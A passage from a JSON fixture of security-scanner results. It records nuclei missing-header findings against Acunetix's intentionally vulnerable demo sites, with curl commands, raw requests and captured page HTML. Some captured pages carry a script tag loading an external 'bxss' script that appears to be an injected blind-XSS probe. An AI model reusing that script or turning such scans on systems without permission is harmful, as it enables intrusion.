testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 467, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:10.541Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 468, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:10.685Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 469, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:10.831Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 470, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:10.986Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 471, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:11.143Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 472, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:11.287Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || 